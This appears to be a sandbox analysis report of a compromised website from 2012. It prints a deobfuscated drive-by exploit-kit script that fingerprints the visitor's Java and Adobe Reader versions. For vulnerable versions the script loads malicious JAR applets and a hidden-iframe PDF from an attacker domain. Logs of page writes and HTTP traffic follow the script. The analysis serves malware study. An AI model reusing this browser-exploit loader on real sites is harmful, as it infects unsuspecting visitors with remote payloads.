if (d) {
f = d
}
}
if (!f && e.isSafari && e.OS == 2) {
j = e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa", 0);
if (j) {
l = e.getNum(j.description);
if (l) {
f = l
}
}
};
if (f) {
m.version = e.formatNum(f)
};
return m
}
},
lang: {
$: 1,
System: {
$: 1,
hasRun: 0,
result: [null, null],
disabled: function() {
return this.$$.isDisabled.windowDotJava()
},
getPropertyHas: function(a) {
var b = this,
d = b.$,
c = b.getProperty()[0];
return (a && c && d.compareNums(d.formatNum(a), d.formatNum(c)) === 0) ? 1 : 0
},
getProperty: function() {
var f = this,
g = f.$,
d = f.$$,
i, h = {},
b = (f.hasRun || f.disabled());
f.hasRun = 1;
if (!b) {
var a = "java_qqq990";
g[a] = null;
try {
var c = document.createElement("script");
c.type = "text/javascript";
c.appendChild(document.createTextNode("(function(){var e;try{if (window.java && window.java.lang && window.java.lang.System){" + g.name + "." + a + '=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" "]}}catch(e){}})();'));
if (g.head.firstChild) {
g.head.insertBefore(c, g.head.firstChild)
} else {
g.head.appendChild(c)
}
g.head.removeChild(c)
} catch (i) {}
if (g[a] && g.isArray(g[a])) {
f.result = [].concat(g[a])
}
}
return f.result
}
}
},
applet: {
$: 1,
results: [
[null, null],
[null, null],
[null, null]
],
getResult: function() {
var c = this.results,
a, b = [];
for (a = 0; a < c.length; a++) {
b = c[a];
if (b[0]) {
break
}
}
return [].concat(b)
},
HTML: [0, 0, 0],
active: [0, 0, 0],
DummyObjTagHTML: 0,
DummySpanTagHTML: 0,
allowed: [1, 1, 1],
VerifyTagsHas: function(c) {
var d = this,
b;
for (b = 0; b < d.allowed.length; b++) {
if (d.allowed[b] === c) {
return 1
}
}
return 0
},
saveAsVerifyTagsArray: function(c) {
var b = this,
d = b.$,
a;
if (d.isArray(c)) {
for (a = 0; a < b.allowed.length; a++) {
if (d.isNum(c[a])) {
if (c[a] < 0) {
c[a] = 0
}
if (c[a] > 3) {
c[a] = 3
}
b.allowed[a] = c[a]
}
}
}
},
setVerifyTagsArray: function(d) {
var b = this,
c = b.$,
a = b.$$;
if (a.getVersionDone === null) {
b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
}
if (a.debug || (a.verify && a.verify.isEnabled())) {
b.saveAsVerifyTagsArray([3, 3, 3])
} else {
if (d) {
b.saveAsVerifyTagsArray(d)
}
}
},
allDisabled: function() {
return this.$$.isDisabled.allApplets()
},
isDisabled: function(d) {
var b = this,
c = b.$,
a = b.$$;
if (d == 2 && !c.isIE) {
return 1
}
if (d === 0 || d == 2) {
return a.isDisabled.ObjectTag()
}
if (d == 1) {
return a.isDisabled.AppletTag()
}
},
can_Insert_Query: function(b) {
var a = this;
if (a.HTML[b]) {
return 0
}
return !a.isDisabled(b)
},
can_Insert_Query_Any: function() {
var b = this,
a;
for (a = 0; a < b.results.length; a++) {
if (b.can_Insert_Query(a)) {
return 1
}
}
return 0
},
should_Insert_Query: function(d) {
var b = this,
e = b.allowed,
c = b.$,
a = b.$$;
if (!b.can_Insert_Query(d)) {
return 0
}
if (e[d] == 3) {
return 1
}
if (e[d] == 2.8 && !b.getResult()[0]) {
return 1
}
if (e[d] == 2.5 && !a.lang.System.getProperty()[0]) {
return 1
}
if (e[d] == 2.2 && !a.lang.System.getProperty()[0] && !b.getResult()[0]) {
return 1
}
if (!a.nonAppletDetectionOk(a.version0)) {
if (e[d] == 2) {
return 1
}
if (e[d] == 1 && !b.getResult()[0]) {
return 1
}
}
return 0
},
should_Insert_Query_Any: function() {
var b = this,
a;
for (a = 0; a < b.allowed.length; a++) {
if (b.should_Insert_Query(a)) {
return 1
}
}
return 0
},
query: function(f) {
var h, a = this,
g = a.$,
d = a.$$,
i = null,
j = null,
b = a.results,
c;
if ((b[f][0] && b[f][1]) || (d.debug && d.OTF < 3)) {
return
}
c = g.getDOMobj(a.HTML[f], true);
if (c) {
try {
i = g.getNum(c.getVersion() + " ");
j = c.getVendor() + " ";
c.statusbar(g.winLoaded ? " " : " ")
} catch (h) {}
if (i && g.isStrNum(i)) {
b[f] = [i, j]
} else {};
try {
if (g.isIE && i && c.readyState != 4) {
g.garbage = true;
c.parentNode.removeChild(c)
}
} catch (h) {}
}
},
insert_Query_Any: function() {
var d = this,
i = d.$,
e = d.$$,
l = d.results,
p = d.HTML,
a = " ",
g = "A.class",
m = i.file.getValid(e);
if (!m) {
return d.getResult()
}
if (e.OTF < 1) {
e.OTF = 1
}
if (d.allDisabled()) {
return d.getResult()
}
if (e.OTF < 1.5) {
e.OTF = 1.5
}
var j = m.name + m.ext,
h = m.path;
var f = ["archive", j, "code", g],
c = ["mayscript", "true"],
o = ["scriptable", "true"].concat(c),
n = e.navigator,
b = !i.isIE && n.mimeObj && n.mimeObj.type ? n.mimeObj.type : e.mimeType[0];
if (d.should_Insert_Query(0)) {
if (e.OTF < 2) {
e.OTF = 2
};
p[0] = i.isIE ? i.insertHTML("object", ["type", b], ["codebase", h].concat(f).concat(o), a, e) : i.insertHTML("object", ["type", b], ["codebase", h].concat(f).concat(o), a, e);
l[0] = [0, 0];
d.query(0)
}
if (d.should_Insert_Query(1)) {
if (e.OTF < 2) {
e.OTF = 2
};
p[1] = i.isIE ? i.insertHTML("applet", ["alt", a].concat(c).concat(f), ["codebase", h].concat(c), a, e) : i.insertHTML("applet", ["codebase", h, "alt", a].concat(c).concat(f), [].concat(c), a, e);
l[1] = [0, 0];
d.query(1)
}
if (d.should_Insert_Query(2)) {
if (e.OTF < 2) {
e.OTF = 2
};
p[2] = i.isIE ? i.insertHTML("object", ["classid", e.classID], ["codebase", h].concat(f).concat(o), a, e) : i.insertHTML();
l[2] = [0, 0];
d.query(2)
}
if (!d.DummyObjTagHTML && !e.isDisabled.ObjectTag()) {
d.DummyObjTagHTML = i.insertHTML("object", [], [], a)
}
if (!d.DummySpanTagHTML) {
d.DummySpanTagHTML = i.insertHTML("", [], [], a)
};
var k = e.NOTF;
if (e.OTF < 3 && k.shouldContinueQuery()) {
e.OTF = 3;
k.onIntervalQuery = i.handler(k.$$onIntervalQuery, k);
if (!i.winLoaded) {
i.WLfuncs0.push([k.winOnLoadQuery, k])
}
setTimeout(k.onIntervalQuery, k.intervalLength)
};
return d.getResult()
}
},
NOTF: {
$: 1,
count: 0,
countMax: 25,
intervalLength: 250,
shouldContinueQuery: function() {
var e = this,
d = e.$,
c = e.$$,
b = c.applet,
a;
for (a = 0; a < b.results.length; a++) {
if (b.HTML[a] && !b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1 && !b.getResult()[0])) && e.isAppletActive(a) >= 0) {
return 1
}
}
return 0
},
isJavaActive: function(d) {
var f = this,
c = f.$$,
a, b, e = -9;
for (a = 0; a < c.applet.HTML.length; a++) {
b = f.isAppletActive(a, d);
if (b > e) {
e = b
}
}
return e
},
isAppletActive: function(c, a) {
var d = this,
b = d.$$.applet.active;
if (!a) {
b[c] = d.isAppletActive_(c)
}
return b[c]
},
isAppletActive_: function(d) {
var g = this,
f = g.$,
b = g.$$,
l = b.navigator,
a = b.applet,
h = a.HTML[d],
i, k, c = 0,
j = f.getTagStatus(h, a.DummySpanTagHTML, a.DummyObjTagHTML, g.count);
if (j == -2) {
return -2
}
try {
if (f.isIE && f.verIE >= b.minIEver && f.getDOMobj(h).object) {
return 1
}
} catch (i) {}
for (k = 0; k < a.active.length; k++) {
if (a.active[k] > 0) {
c = 1
}
}
if (j == 1 && (f.isIE || ((b.version0 && l.javaEnabled() && l.mimeObj && (h.tagName == "object" || c)) || b.lang.System.getProperty()[0]))) {
return 1
}
if (j < 0) {
return -1
}
return 0
},
winOnLoadQuery: function(c, d) {
var b = d.$$,
a;
if (b.OTF == 3) {
a = d.queryAllApplets();
d.queryCompleted(a[1], a[2])
}
},
$$onIntervalQuery: function(d) {
var c = d.$,
b = d.$$,
a;
if (b.OTF == 3) {
a = d.queryAllApplets();
if (!d.shouldContinueQuery() || (c.winLoaded && d.count > d.countMax)) {
d.queryCompleted(a[1], a[2])
}
}
d.count++;
if (b.OTF == 3) {
setTimeout(d.onIntervalQuery, d.intervalLength)
}
},
queryAllApplets: function() {
var g = this,
f = g.$,
e = g.$$,
d = e.applet,
b, a, c;
for (b = 0; b < d.results.length; b++) {
d.query(b)
}
a = d.getResult();
c = a[0] ? true : false;
return [c, a[0], a[1]]
},
queryCompleted: function(c, f) {
var e = this,
d = e.$,
b = e.$$;
if (b.OTF >= 4) {
return
}
b.OTF = 4;
var a = e.isJavaActive();
b.setPluginStatus(c, f, 0);
if (b.funcs) {
d.callArray(b.funcs)
}
if (d.onDoneEmptyDiv) {
d.onDoneEmptyDiv()
}
}
},
zz: 0
},
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {},
pluginHasMimeType: function(d, c, f) {
var b = this,
e = b.$,
a;
for (a in d) {
if (d[a] && d[a].type && d[a].type == c) {
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)) {
return 1
}
return 0
},
getVersion: function(l, j) {
var g = this,
d = g.$,
i, f, m, n, b = null,
h = null,
k = g.mimeType,
a, c;
if (d.isString(j)) {
j = j.replace(/\s/g, "");
if (j) {
k = j
}
} else {
j = null
}
if (d.isDefined(g.INSTALLED[k])) {
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0) {
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j) {
n = b
}
if (!b && d.hasMimeType(g.mimeType)) {
b = d.findNavPlugin(a, 0)
}
if (b) {
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1) {
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
h = "9"
} else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
h = "8"
}
}
}
}
} else {
h = g.version
}
if (!d.isDefined(n)) {
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
} else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
for (m = 0; m < 5; m++) {
if (c.test(f) && (!h || RegExp.$1 > h)) {
h = RegExp.$1
}
}
} catch (i) {}
g.installed = h ? 1 : (b ? 0 : -1)
}
if (!g.version) {
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
},
zz: 0
}
};
stfo.initScript();
jver = stfo.getVersion("Java");
if (typeof jver == "string") {
jver = jver.split(",");
if (jver[3].length == 1) {
jver = "" + jver[1] + "0" + jver[3];
} else {
jver = "" + jver[1] + jver[3];
}
} else {
jver = 0;
}
pdfver = stfo.getVersion("AdobeReader");
if (typeof pdfver == "string") {
pdfver = pdfver.split(",");
pdfver[3] = pdfver[3].substring(0, 1);
pdfver = parseInt(pdfver.join(""), 10);
} else {
pdfver = 0;
}
if (jver >= 400 && jver < 700) {
var qh = document.createElement("applet");
qh.setAttribute("code", "den.class");
qh.setAttribute("archive", "http://nalivaipervuu.info/barracuda.jar");
var rhp = document.createElement("param");
rhp.setAttribute("name", "boierthjwiorjweiorjweiorjewiorjwioesjznzosowpw0435");
rhp.setAttribute("value", "807328e0h6c2f58b7t8b956cdft9402bb0cpe0ea617d:a4d4cc06/d68aa711/ff4c8556n7f576559a5297b77dl5080ce18i3b81c714v9d08f20aa922126c6i97e8012epc88ee293e9577df75r7ea75e14v5df88dd8uf6fcd899u67b879d7.87a5f926i5eba00f9nba3d7a0cf247dc907o77be74bc/dfdb9d63oc2816441u33f7db25t6b381e5e.752dd462p9869e60eh51cf1925p5bd68dc3?55f1ddeea7138f7c6=bcec3cab4219119b07c1ae486504644529af94629c970c8c633862668c1f5218acaee384d2a93c184560697b71124fa48a00fa39301f5d6a1e22006da5046349380afb0c3139acb174cf6854022decf8e66055ea6500710a7a9b84420bc107db4cdeabeeb70729094acf91676c3f073a0bee3a0790ef8d17a2079f2421b1cca0025f0234dc9e2ba589b02200f8d5aac7386b9808&982822dcp3bbcdc41=6fbed8ed1");
qh.appendChild(rhp);
document.body.appendChild(qh);
};
if (jver >= 700 && jver < 707) {
var rh = document.createElement("applet");
rh.setAttribute("code", "pilot.class");
rh.setAttribute("archive", "http://nalivaipervuu.info/blevota.jar");
var rhp = document.createElement("param");
rhp.setAttribute("name", "boierthjwiorjweiorjweiorjewiorjwioesjznzosowpw0435");
rhp.setAttribute("value", "136df6ech799ae06ct99dd8a94td81ad008p3eac56fb:465cd4d8/4b445688/426a7686n964c8956a6bd4e2f3l281b90c8i95e8f7c5v382eb406afc130bcei52000497p42c9a566e337ed329r6015a9a2vbbe2928du9d86e7beu562a290d.6a7b0ccci40cb4392ne9535fc4f512c05f7obc9b1dba/afa3032coa1c2363fud7446935t5bc9a254.ae0437fdp08771c75h927c0402p3f93793c?15c343cfa5d0a6d2a=58794f9542b49c700781bc26fb0d08409bdf2caa7cec0c592bb4d20d1a2c36174df0a284bc3009ea47fd9bef1122da896a0bcbc3206fb80413fd01de6270c3bb8c3cf60090176611154712130efa4054a605bb18d10e479c20ebdb6272fd00384ab60bf556e45d0ab1b88ce795604b4d0a21316da054926ff40624eb3f31d5e63905045cd1ddcb2fb306790b153d2587cb491123&f7944f4bp14eea38e=58b831e92");
rh.appendChild(rhp);
document.body.appendChild(rh);
};
function ifr(abc) {
var dh = document.createElement("iframe");
dh.setAttribute("width", 1);
dh.setAttribute("height", 1);
dh.setAttribute("src", abc);
document.body.appendChild(dh);
};
function pdf() {
try {
if ((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9301)) {
ifr("http://nalivaipervuu.info/manual.pdf");
}
} catch (e) {}
}
setTimeout(pdf, 3100); |
Executed Evals (0)
Executed Writes (24)
#1 JavaScript::Write (size: 462, repeated: 1) |
#2 JavaScript::Write (size: 461, repeated: 1) |
#3 JavaScript::Write (size: 461, repeated: 1) |
#4 JavaScript::Write (size: 462, repeated: 1) |
#5 JavaScript::Write (size: 461, repeated: 1) |
#6 JavaScript::Write (size: 461, repeated: 1) |
#7 JavaScript::Write (size: 25, repeated: 12) |
#8 JavaScript::Write (size: 46, repeated: 1) |
#9 JavaScript::Write (size: 799, repeated: 1) |
#10 JavaScript::Write (size: 824, repeated: 1) |
#11 JavaScript::Write (size: 837, repeated: 1) |
#12 JavaScript::Write (size: 863, repeated: 1) |
#13 JavaScript::Write (size: 864, repeated: 1) |
#14 JavaScript::Write (size: 878, repeated: 1) |
#15 JavaScript::Write (size: 766, repeated: 1) |
#16 JavaScript::Write (size: 766, repeated: 1) |
#17 JavaScript::Write (size: 766, repeated: 1) |
#18 JavaScript::Write (size: 769, repeated: 1) |
#19 JavaScript::Write (size: 766, repeated: 1) |
#20 JavaScript::Write (size: 766, repeated: 1) |
#21 JavaScript::Write (size: 586, repeated: 1) |
#22 JavaScript::Write (size: 86, repeated: 6) |
#23 JavaScript::Write (size: 80, repeated: 1) |
#24 JavaScript::Write (size: 105, repeated: 6) |
HTTP Transactions (71)
| Request | Response |
|---|---|
GET /pagead/show_ads.js HTTP/1.1
| HTTP/1.1 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" |
GET /beta/ HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:35 GMT |
GET /images/poweredby_transparent/poweredby_FFFFFF.gif HTTP/1.1
| HTTP/1.1 200 OK Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT |
GET /favicon.ico HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/styles.css HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/calendar-system.css HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/mn_new_listings.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/logo.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/mn_hot_listings.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /cse/api/branding.css HTTP/1.1
| HTTP/1.1 200 OK Last-Modified: Sat, 17 Nov 2007 23:34:50 GMT |
GET /beta/blocks/block.login.php HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/blocks/block.whos_online.php HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /gampad/google_service.js HTTP/1.1
| HTTP/1.1 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" |
GET /beta/themes/kosmos/images/mn_top_rated.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /news/tbn/EkxUtAk1PsBxjM/0.jpg HTTP/1.1
| HTTP/1.1 200 OK Last-Modified: Wed, 07 Nov 2012 17:02:41 GMT |
GET /beta/themes/kosmos/images/mn_editor_pick.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /news/tbn/ZKY7P8VM2htATM/0.jpg HTTP/1.1
| HTTP/1.1 200 OK Last-Modified: Wed, 07 Nov 2012 20:20:59 GMT |
GET /news/tbn/zCxwV9ikQ1InDM/0.jpg HTTP/1.1
| HTTP/1.1 200 OK Last-Modified: Wed, 07 Nov 2012 15:12:57 GMT |
GET /news/tbn/La__1r-O16C61M/0.jpg HTTP/1.1
| HTTP/1.1 200 OK Last-Modified: Wed, 07 Nov 2012 22:05:58 GMT |
GET /beta/themes/kosmos/images/mn_add_a_listing.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/logo.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /pagead/js/r20121031/r20120730/show_ads_impl.js HTTP/1.1
| HTTP/1.1 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" |
GET /t?s=%5EBSESN HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:36 GMT |
GET /t?s=%5EDJI HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:36 GMT |
GET /beta/themes/kosmos/images/mn_get_rated.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/mn_update_a_listing.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/mn_upgrade_a_listing.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/template_10.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/template_12.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /themes/kosmos/images/template_24.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/template_24.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/pr/9.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/pr/8.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/pr/7.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /pagead/expansion_embed.js HTTP/1.1
| HTTP/1.1 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" |
GET /beta/themes/kosmos/images/pr/6.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/pr/5.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/captcha.php?x HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/folder.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076404&bpp=14&shv=r20121031&jsv=r20110914&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=196&ady=316&biw=1159&bih=778&oid=3&fu=0&ifi=1&dtd=461&xpc=eQPNEDLsfI&p=http%3A//www.indiansites.in HTTP/1.1 GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076404&bpp=14&shv=r20121031&jsv=r20110914&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=196&ady=316&biw=1159&bih=778&oid=3&fu=0&ifi=1&dtd=461&xpc=eQPNEDLsfI&p=http%3A//www.indiansites.in HTTP/1.1 | HTTP/1.1 403 Forbidden P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
GET /beta/themes/kosmos/images/template_01.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/mn_new_listings.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/template_13.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /pagead/osd.js HTTP/1.1
| HTTP/1.1 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" |
GET /beta/themes/kosmos/images/new.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /image.aspx?url=http://timesofindia.indiatimes.com/ HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: public, max-age=604800, s-maxage=604800 |
GET /gampad/google_ads.js HTTP/1.1
| HTTP/1.1 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" |
GET /beta/themes/kosmos/images/rss.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /themes/kosmos/images/template_23.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/template_23.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /beta/themes/kosmos/images/template_26.gif HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076454&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=321&biw=1159&bih=778&oid=3&fu=0&ifi=2&dtd=743&xpc=c60Sk3157Q&p=http%3A//www.indiansites.in HTTP/1.1 GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076454&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=321&biw=1159&bih=778&oid=3&fu=0&ifi=2&dtd=743&xpc=c60Sk3157Q&p=http%3A//www.indiansites.in HTTP/1.1 | HTTP/1.1 403 Forbidden P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
GET /gampad/ads?correlator=3822782316923799&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8412828530142307&slotname=homepage_right&page_slots=homepage_right&cookie_enabled=1&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&lmt=1352339075&dt=1352339077203&cc=16&biw=1159&bih=778&adk=2104700816&adx=869&ady=979&ifi=7&oid=3&u_tz=60&u_his=1&u_java=true&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&flash=10.0.45&gads=v2&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876 HTTP/1.1 GET /gampad/ads?correlator=3822782316923799&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8412828530142307&slotname=homepage_right&page_slots=homepage_right&cookie_enabled=1&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&lmt=1352339075&dt=1352339077203&cc=16&biw=1159&bih=778&adk=2104700816&adx=869&ady=979&ifi=7&oid=3&u_tz=60&u_his=1&u_java=true&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&flash=10.0.45&gads=v2&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876 HTTP/1.1 | HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076476&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=346&biw=1159&bih=778&oid=3&fu=0&ifi=3&dtd=798&xpc=uTgFQN3FNV&p=http%3A//www.indiansites.in HTTP/1.1 GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076476&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=346&biw=1159&bih=778&oid=3&fu=0&ifi=3&dtd=798&xpc=uTgFQN3FNV&p=http%3A//www.indiansites.in HTTP/1.1 | HTTP/1.1 403 Forbidden P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
